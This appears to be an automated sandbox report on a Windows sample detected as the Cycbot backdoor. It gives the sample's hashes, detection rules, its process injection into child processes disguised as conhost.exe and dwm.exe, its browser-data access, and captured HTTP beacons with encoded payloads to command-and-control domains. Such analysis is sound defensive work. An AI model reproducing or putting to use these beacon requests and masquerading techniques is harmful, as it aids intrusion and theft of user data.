Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
140s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18/12/2024, 22:45 UTC
Static task
static1
Behavioral task
behavioral1
Sample
fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Resource
win7-20240903-en
General
-
Target
fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
-
Size
186KB
-
MD5
fd67bacae904767f1a03549b40df8c2b
-
SHA1
19f9aee4123950ce0479248eebfb664dee965880
-
SHA256
554b6d86320bcde0116a2295ea88d08204a8954bde3a309292c1899ac089be89
-
SHA512
02bbb8b80023cb1442896e76121741419035d5c8ddecf8268dc8d1edf5271c0e9f3b22a4cb5dfdf5aae670e74018c948b62255faa37e766ee01a55f15dc7d35a
-
SSDEEP
3072:AHoD8YbYxBB7n+mD1//Csd/xcVzwllyVE2PdkPEPiLrz3NOJ99fNF9nC4Oien8pm:2Dxj6Y1nCkysRIuPEUOf9ZnUqICS
Malware Config
Signatures
-
Cycbot family
-
Detects Cycbot payload 5 IoCs
Cycbot is a backdoor and trojan written in C++.
resource yara_rule behavioral1/memory/2616-13-0x0000000000400000-0x000000000044E000-memory.dmp family_cycbot behavioral1/memory/2756-14-0x0000000000400000-0x000000000044E000-memory.dmp family_cycbot behavioral1/memory/2160-79-0x0000000000400000-0x000000000044E000-memory.dmp family_cycbot behavioral1/memory/2756-151-0x0000000000400000-0x000000000044E000-memory.dmp family_cycbot behavioral1/memory/2756-188-0x0000000000400000-0x000000000044E000-memory.dmp family_cycbot -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/2756-2-0x0000000000400000-0x000000000044E000-memory.dmp upx behavioral1/memory/2616-12-0x0000000000400000-0x000000000044E000-memory.dmp upx behavioral1/memory/2616-13-0x0000000000400000-0x000000000044E000-memory.dmp upx behavioral1/memory/2756-14-0x0000000000400000-0x000000000044E000-memory.dmp upx behavioral1/memory/2160-79-0x0000000000400000-0x000000000044E000-memory.dmp upx behavioral1/memory/2160-77-0x0000000000400000-0x000000000044E000-memory.dmp upx behavioral1/memory/2756-151-0x0000000000400000-0x000000000044E000-memory.dmp upx behavioral1/memory/2756-188-0x0000000000400000-0x000000000044E000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2756 wrote to memory of 2616 2756 fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe 30 PID 2756 wrote to memory of 2616 2756 fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe 30 PID 2756 wrote to memory of 2616 2756 fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe 30 PID 2756 wrote to memory of 2616 2756 fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe 30 PID 2756 wrote to memory of 2160 2756 fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe 32 PID 2756 wrote to memory of 2160 2756 fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe 32 PID 2756 wrote to memory of 2160 2756 fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe 32 PID 2756 wrote to memory of 2160 2756 fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe startC:\Users\Admin\AppData\Roaming\Microsoft\conhost.exe%C:\Users\Admin\AppData\Roaming\Microsoft2⤵
- System Location Discovery: System Language Discovery
PID:2616
-
-
C:\Users\Admin\AppData\Local\Temp\fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exeC:\Users\Admin\AppData\Local\Temp\fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe startC:\Users\Admin\AppData\Roaming\dwm.exe%C:\Users\Admin\AppData\Roaming2⤵
- System Location Discovery: System Language Discovery
PID:2160
-
Network
-
Remote address:8.8.8.8:53Requestgreenherbalteaonline.comIN AResponse
-
Remote address:8.8.8.8:53Requestmilkiwals.comIN AResponse
-
Remote address:8.8.8.8:53Requestkinderjoys.comIN AResponsekinderjoys.comIN A3.33.251.168kinderjoys.comIN A15.197.225.128
-
Remote address:8.8.8.8:53Requestzonedg.comIN AResponsezonedg.comIN A103.224.212.214
-
Remote address:8.8.8.8:53Requestzonedg.comIN AResponsezonedg.comIN A103.224.212.214
-
POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3Dfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exeRemote address:103.224.212.214:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonedg.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 302 Found
server: Apache
set-cookie: __tad=1734561930.5327036; expires=Sat, 16-Dec-2034 22:45:30 GMT; Max-Age=315360000
location: http://ww25.zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D&subid1=20241219-0945-303a-9ed3-05fd938bc6df
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
-
GEThttp://kinderjoys.com/blog/images/3521.jpg?v52=93&tq=gKZEtzyMv5rJqxG1J42pzMffBvAi0OjbwvgS917W65rJqlLfgPiWW1cgfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exeRemote address:3.33.251.168:80RequestGET /blog/images/3521.jpg?v52=93&tq=gKZEtzyMv5rJqxG1J42pzMffBvAi0OjbwvgS917W65rJqlLfgPiWW1cg HTTP/1.0
Connection: close
Host: kinderjoys.com
Accept: */*
User-Agent: mozilla/2.0
ResponseHTTP/1.1 404 Not Found
Date: Wed, 18 Dec 2024 22:45:30 GMT
Content-Length: 0
Connection: close
WAFRule: 5
-
POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3Dfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exeRemote address:103.224.212.214:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
Host: zonedg.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 302 Found
server: Apache
set-cookie: __tad=1734561930.7475540; expires=Sat, 16-Dec-2034 22:45:30 GMT; Max-Age=315360000
location: http://ww25.zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D&subid1=20241219-0945-3053-9aec-87ca61af6097
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
-
POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqpSr%2Fe%2BV5ZuRg%3D%3Dfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exeRemote address:103.224.212.214:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonedg.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 302 Found
server: Apache
set-cookie: __tad=1734561930.3748446; expires=Sat, 16-Dec-2034 22:45:30 GMT; Max-Age=315360000
location: http://ww25.zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D&subid1=20241219-0945-303d-8535-0fbe83ff1805
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
-
POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3Dfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exeRemote address:103.224.212.214:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonedg.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 302 Found
server: Apache
set-cookie: __tad=1734561930.5182439; expires=Sat, 16-Dec-2034 22:45:30 GMT; Max-Age=315360000
location: http://ww25.zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D&subid1=20241219-0945-30d2-b509-8f4e9ae7109b
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
-
POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3Dfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exeRemote address:103.224.212.214:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonedg.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 302 Found
server: Apache
set-cookie: __tad=1734561930.5395299; expires=Sat, 16-Dec-2034 22:45:30 GMT; Max-Age=315360000
location: http://ww25.zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D&subid1=20241219-0945-307d-a258-fc71d742ad07
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A172.217.20.164
-
Remote address:172.217.20.164:80RequestGET / HTTP/1.0
Connection: close
Host: www.google.com
Accept: */*
ResponseHTTP/1.0 302 Found
x-hallmonitor-challenge: CgwIr6GNuwYQpbfQ2AMSBLXXsFM
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-QQZO9eWMrmhl8dSRrswEMA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Wed, 18 Dec 2024 22:46:07 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-VtuCQTSJuyAkUmwWJ4apqBGq44OyQlTmGF_IuyYN7XzYhnbWzKDHY; expires=Mon, 16-Jun-2025 22:46:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
-
POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5Gfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exeRemote address:103.224.212.214:80RequestPOST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5G HTTP/1.1
Host: zonedg.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
ResponseHTTP/1.1 302 Found
server: Apache
set-cookie: __tad=1734561970.3006154; expires=Sat, 16-Dec-2034 22:46:10 GMT; Max-Age=315360000
location: http://ww25.zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5G&subid1=20241219-0946-10bf-baed-67def1f39522
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
-
Remote address:172.217.20.164:80RequestGET / HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
ResponseHTTP/1.1 302 Found
x-hallmonitor-challenge: CgsIs6GNuwYQlf-CBBIEtdewUw
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-c1cgc53MUobdwEqMksv9ag' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Wed, 18 Dec 2024 22:46:11 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-UX5VwKI1P-RNZN_VQZJkU0apYH8T9aRNVLSLIFcYNvJpWDwEv3zo4; expires=Mon, 16-Jun-2025 22:46:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Connection: close
-
GEThttp://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGLKhjbsGIjDIGYFe_2OcpQAh-SG_rKAQa8Ve9BVoCxawSvv9sh3Fh-RwAe_Im_fMWWhhgg4jscAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exeRemote address:172.217.20.164:80RequestGET /sorry/index?continue=http://www.google.com/&q=EgS117BTGLKhjbsGIjDIGYFe_2OcpQAh-SG_rKAQa8Ve9BVoCxawSvv9sh3Fh-RwAe_Im_fMWWhhgg4jscAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
ResponseHTTP/1.1 429 Too Many Requests
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3075
X-XSS-Protection: 0
Connection: close
-
103.224.212.214:80http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3Dhttpfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe585 B 758 B 5 5
HTTP Request
POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
302 -
3.33.251.168:80http://kinderjoys.com/blog/images/3521.jpg?v52=93&tq=gKZEtzyMv5rJqxG1J42pzMffBvAi0OjbwvgS917W65rJqlLfgPiWW1cghttpfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe460 B 385 B 6 6
HTTP Request
GET http://kinderjoys.com/blog/images/3521.jpg?v52=93&tq=gKZEtzyMv5rJqxG1J42pzMffBvAi0OjbwvgS917W65rJqlLfgPiWW1cgHTTP Response
404 -
103.224.212.214:80http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3Dhttpfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe567 B 700 B 5 4
HTTP Request
POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3DHTTP Response
302 -
103.224.212.214:80http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqpSr%2Fe%2BV5ZuRg%3D%3Dhttpfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe587 B 720 B 5 4
HTTP Request
POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqpSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
302 -
103.224.212.214:80http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3Dhttpfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe593 B 726 B 5 4
HTTP Request
POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
302 -
103.224.212.214:80http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3Dhttpfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe587 B 720 B 5 4
HTTP Request
POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3DHTTP Response
302 -
302 B 1.5kB 5 5
HTTP Request
GET http://www.google.com/HTTP Response
302 -
-
103.224.212.214:80http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5Ghttpfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe1.0kB 712 B 7 4
HTTP Request
POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5GHTTP Response
302 -
516 B 1.5kB 8 5
HTTP Request
GET http://www.google.com/HTTP Response
302 -
-
172.217.20.164:80http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGLKhjbsGIjDIGYFe_2OcpQAh-SG_rKAQa8Ve9BVoCxawSvv9sh3Fh-RwAe_Im_fMWWhhgg4jscAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMhttpfd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe1.2kB 3.7kB 10 8
HTTP Request
GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGLKhjbsGIjDIGYFe_2OcpQAh-SG_rKAQa8Ve9BVoCxawSvv9sh3Fh-RwAe_Im_fMWWhhgg4jscAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMHTTP Response
429
-
70 B 143 B 1 1
DNS Request
greenherbalteaonline.com
-
59 B 132 B 1 1
DNS Request
milkiwals.com
-
60 B 92 B 1 1
DNS Request
kinderjoys.com
DNS Response
3.33.251.16815.197.225.128
-
56 B 72 B 1 1
DNS Request
zonedg.com
DNS Response
103.224.212.214
-
56 B 72 B 1 1
DNS Request
zonedg.com
DNS Response
103.224.212.214
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
172.217.20.164
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51724eac0f357d168b3d4a0c9f009a6b2
SHA1b360af81343395995671a9613b38e01c9e7530bb
SHA256101de1f701d49131a60a2f6abaf4285bd90a283ca6951025ae7c97867288ee21
SHA512a46862e51200a36f0caec516e388f95640c50143e9f24364444ef4a38b02da581d655c75807d75efd4a47e190a700a6252fe1907024905e943a6b626e2cae5c6
-
Filesize
600B
MD5a94444cc9a5f0167775c357de3ca901c
SHA160c6ce8718c63ec95bd36715bc045191723877ae
SHA25693dd15748168be9c2a28a8af26bf15a7bd16a87342c5f97e94cbc063f075d2f7
SHA51244cf44925e533d265bebd7b1a7b996cf6155d0a58ea943a1771b918801b03c6fe74946df6c7a5ee696b7650d768e65651043c5b12bc7996158059e451a40408b
-
Filesize
996B
MD52397d777eab64ffbf8454f2aa887d60c
SHA17b1887dc8b1383487fc661562f209c082e2124ca
SHA256f66997d75fe9804c5ff33159025169c27de1f33a2c4091ff45947c21e11969c0
SHA5120aa8af5f7a34561cec9689c33a53778bda1742cb2224d868950a10f655407943fd06e946e9a2d8fb1a71e5d794d95cfe910699d1482bd8bcf95a91f56e34d30c